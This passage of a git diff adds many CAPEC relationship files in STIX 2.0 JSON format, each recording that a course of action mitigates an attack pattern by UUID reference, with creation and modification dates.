"course-of-action--e9cc1876-cdac-43ec-b5a0-bc4b8278c9a2", + "target_ref": "attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4.json b/capec/relationship/relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4.json new file mode 100644 index 0000000000..3e24d468fa --- /dev/null +++ b/capec/relationship/relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e09c168b-7acc-4dbb-9257-68686f071ffd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b001554-1162-4f14-acbc-ae6fabb9dee4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933", + "target_ref": "attack-pattern--ba3ec386-76ed-49d9-8257-a4c3a772d6c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b13aeb5-0061-4faf-a904-f6284e70689e.json b/capec/relationship/relationship--9b13aeb5-0061-4faf-a904-f6284e70689e.json new file mode 100644 index 0000000000..05a78257ac --- /dev/null +++ b/capec/relationship/relationship--9b13aeb5-0061-4faf-a904-f6284e70689e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d76eb324-cdae-4f35-b98a-37c1f4a8db35", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b13aeb5-0061-4faf-a904-f6284e70689e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc", + "target_ref": "attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b6f79fa-271d-4307-90be-f07986141adf.json b/capec/relationship/relationship--9b6f79fa-271d-4307-90be-f07986141adf.json new file mode 100644 index 0000000000..c44ac8ece5 --- /dev/null +++ b/capec/relationship/relationship--9b6f79fa-271d-4307-90be-f07986141adf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fd85258e-2115-4ca4-ad33-ebe18d747989", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b6f79fa-271d-4307-90be-f07986141adf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--860deb05-098f-491a-b16a-b8e57469c59d", + "target_ref": "attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b804090-8565-4f9a-b785-46ad01aab0b6.json b/capec/relationship/relationship--9b804090-8565-4f9a-b785-46ad01aab0b6.json new file mode 100644 index 0000000000..27de3df35c --- /dev/null +++ b/capec/relationship/relationship--9b804090-8565-4f9a-b785-46ad01aab0b6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ca0736fd-701a-4341-8bc7-5845937c905a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b804090-8565-4f9a-b785-46ad01aab0b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--280047d5-2fea-4418-8952-f13e43540cdf", + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b8604b5-deb3-48af-a72b-c84250ac0317.json b/capec/relationship/relationship--9b8604b5-deb3-48af-a72b-c84250ac0317.json new file mode 100644 index 0000000000..abca45f1b4 --- /dev/null +++ b/capec/relationship/relationship--9b8604b5-deb3-48af-a72b-c84250ac0317.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e44db32e-e8d9-444e-9946-61a8f7c7c7fe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b8604b5-deb3-48af-a72b-c84250ac0317", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577", + "target_ref": "attack-pattern--ad128bd2-2861-4d14-a127-2401a369742a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9b940f35-fced-43d4-b905-57b91eb79f96.json b/capec/relationship/relationship--9b940f35-fced-43d4-b905-57b91eb79f96.json new file mode 100644 index 0000000000..8f0e540f6b --- /dev/null +++ b/capec/relationship/relationship--9b940f35-fced-43d4-b905-57b91eb79f96.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--060cbc9e-73c4-4a01-a0b1-9a28e9e9acdb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9b940f35-fced-43d4-b905-57b91eb79f96", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5", + "target_ref": "attack-pattern--835a2a0b-1d06-4d73-a726-edf02da8dd54", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04.json b/capec/relationship/relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04.json new file mode 100644 index 0000000000..b314ceaa45 --- /dev/null +++ b/capec/relationship/relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d5e71cc3-b61b-49f0-b9eb-a86435c0cf88", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9bd389e5-7353-481d-a15f-0dd86ff65e04", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e37545a6-d0e5-4e14-9145-0795cc3b9dec", + "target_ref": "attack-pattern--86e31b64-8521-4fa2-ad2b-3ca2d036d398", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58.json b/capec/relationship/relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58.json new file mode 100644 index 0000000000..b5cc54f50b --- /dev/null +++ b/capec/relationship/relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e99c5964-f25c-4e6a-a077-34cbde6763b5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9c42b260-3a66-4a10-a9f2-92c5bca59e58", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4dcaaf9-90cf-4710-8e21-3826cee87167", + "target_ref": "attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e.json b/capec/relationship/relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e.json new file mode 100644 index 0000000000..25393da2cf --- /dev/null +++ b/capec/relationship/relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5fd3cc65-1e14-4eec-b1dc-9e658a3a6e02", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f", + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7.json b/capec/relationship/relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7.json new file mode 100644 index 0000000000..355209c9ba --- /dev/null +++ b/capec/relationship/relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cc6a0c93-3d1d-4542-91c3-ca7729b95887", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9cb2c5bf-0fb9-4ca7-b1b4-703d684cb8d7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6", + "target_ref": "attack-pattern--da89b021-dcf2-4901-9584-c264140320ae", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9dccfaf7-028b-4ade-a84e-fb04748d4e00.json b/capec/relationship/relationship--9dccfaf7-028b-4ade-a84e-fb04748d4e00.json new file mode 100644 index 0000000000..368f61e433 --- /dev/null +++ b/capec/relationship/relationship--9dccfaf7-028b-4ade-a84e-fb04748d4e00.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--434e6afb-3e2c-4843-842c-7dc0c82512d2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9dccfaf7-028b-4ade-a84e-fb04748d4e00", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f010580e-dc07-4767-a265-30e908fb80a8", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1.json b/capec/relationship/relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1.json new file mode 100644 index 0000000000..b52fa8764e --- /dev/null +++ b/capec/relationship/relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4fa70cf5-30fd-41a9-81ed-e64324af2abc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd.json b/capec/relationship/relationship--9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd.json new file mode 100644 index 0000000000..b1932e916e --- /dev/null +++ b/capec/relationship/relationship--9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--63536d95-6656-4779-8ffe-8510d35073a7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9e5fb7cb-c6d3-46ad-bab1-db9db3c164dd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6775324-11a4-4066-80ff-bc354993450c", + "target_ref": "attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9ea36268-c2cd-4bb6-9a13-9fd992be4272.json b/capec/relationship/relationship--9ea36268-c2cd-4bb6-9a13-9fd992be4272.json new file mode 100644 index 0000000000..bd86c7ff7a --- /dev/null +++ b/capec/relationship/relationship--9ea36268-c2cd-4bb6-9a13-9fd992be4272.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--deb276eb-d6d5-4ad8-8b08-91ee8fff7ac9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9ea36268-c2cd-4bb6-9a13-9fd992be4272", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3.json b/capec/relationship/relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3.json new file mode 100644 index 0000000000..ed2d217d6c --- /dev/null +++ b/capec/relationship/relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7e522d33-53a4-4f5c-8a02-b48afa6e202b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9efb57e9-10c7-45fb-b44c-fe96ed2fdbe3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a82feec6-2335-4de6-8ade-444a8c542d19", + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762.json b/capec/relationship/relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762.json new file mode 100644 index 0000000000..9ffcb670bc --- /dev/null +++ b/capec/relationship/relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c0efe9ff-f056-475b-a111-5d13e1b96065", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9f18e491-5633-4ed9-ac64-4c31bef0b762", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22", + "target_ref": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661.json b/capec/relationship/relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661.json new file mode 100644 index 0000000000..7e2226e178 --- /dev/null +++ b/capec/relationship/relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dbe99e39-7171-4702-b668-b57e0b31e541", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9fa5c9f5-e86e-4150-86a2-9e4681532661", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9fdf5739-9951-4e6d-a393-920bca359c7b.json b/capec/relationship/relationship--9fdf5739-9951-4e6d-a393-920bca359c7b.json new file mode 100644 index 0000000000..5018020226 --- /dev/null +++ b/capec/relationship/relationship--9fdf5739-9951-4e6d-a393-920bca359c7b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--961ddb7f-c260-4479-b2f5-4458d87c8603", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9fdf5739-9951-4e6d-a393-920bca359c7b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-01T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b", + "target_ref": "attack-pattern--8304a46e-2589-411b-bdb0-db7c3ad7ae06", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87.json b/capec/relationship/relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87.json new file mode 100644 index 0000000000..4c73b30066 --- /dev/null +++ b/capec/relationship/relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--baba199f-1fdd-413c-8e7f-cd0fbd9b1ef1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a05b8a5c-7e75-4870-8aef-4e433c3e2a87", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e019f7bf-bb49-46a3-990b-261c1993c535", + "target_ref": "attack-pattern--82d6f39b-0888-4a4c-ada5-70206ee62411", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a1307e4c-a783-4836-b078-188634674a29.json b/capec/relationship/relationship--a1307e4c-a783-4836-b078-188634674a29.json new file mode 100644 index 0000000000..19049560f0 --- /dev/null +++ b/capec/relationship/relationship--a1307e4c-a783-4836-b078-188634674a29.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--60cc3df5-8896-421f-9e50-358c51f4a1db", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a1307e4c-a783-4836-b078-188634674a29", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e8688baf-3694-4ee8-91f4-54424d9675fa", + "target_ref": "attack-pattern--bc7b8c08-6c6e-42fd-9c78-be5ed35d8ecb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735.json b/capec/relationship/relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735.json new file mode 100644 index 0000000000..468650ce48 --- /dev/null +++ b/capec/relationship/relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ab9aedc3-4a6d-4b01-bae8-9a53216035e7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20.json b/capec/relationship/relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20.json new file mode 100644 index 0000000000..75e1ec3a43 --- /dev/null +++ b/capec/relationship/relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e32f0497-950c-437d-8677-65934107d593", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5.json b/capec/relationship/relationship--a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5.json new file mode 100644 index 0000000000..0f3e0b0c22 --- /dev/null +++ b/capec/relationship/relationship--a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cd68efa3-c286-4732-984b-bac92da2b0b3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a2bf74d1-dba2-4b85-b66c-c35fc90c1ee5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e", + "target_ref": "attack-pattern--ecbfaa5c-9426-4e2e-9621-4c12bfafbe95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e.json b/capec/relationship/relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e.json new file mode 100644 index 0000000000..8acb77bd89 --- /dev/null +++ b/capec/relationship/relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d0bea568-1dcb-4e10-a811-0f8f7d300e03", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a2e6af07-0ede-4f9b-a34b-e30833fd8b5e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd.json b/capec/relationship/relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd.json new file mode 100644 index 0000000000..46010f7824 --- /dev/null +++ b/capec/relationship/relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--43c5dd83-94dc-41a6-a17f-46ce8045e704", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a368132d-2ecf-40b4-8ce3-5f5933f296fd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580", + "target_ref": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2.json b/capec/relationship/relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2.json new file mode 100644 index 0000000000..97a9772c2b --- /dev/null +++ b/capec/relationship/relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d299251-f06e-48e0-aab5-217fe2c43074", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a39c75cf-553e-4ede-a010-3ce094d2b7c2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", + "target_ref": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57.json b/capec/relationship/relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57.json new file mode 100644 index 0000000000..411a7ffc8d --- /dev/null +++ b/capec/relationship/relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4f4146b4-32c9-4951-8fee-6b7ebb601933", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec", + "target_ref": "attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a40d425c-439a-4eb3-af1e-e29e9c8a0152.json b/capec/relationship/relationship--a40d425c-439a-4eb3-af1e-e29e9c8a0152.json new file mode 100644 index 0000000000..5ec6ef98a9 --- /dev/null +++ b/capec/relationship/relationship--a40d425c-439a-4eb3-af1e-e29e9c8a0152.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0bfbf20c-c7ae-441d-9dac-d7c0e17d36ed", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a40d425c-439a-4eb3-af1e-e29e9c8a0152", + "created_by_ref": 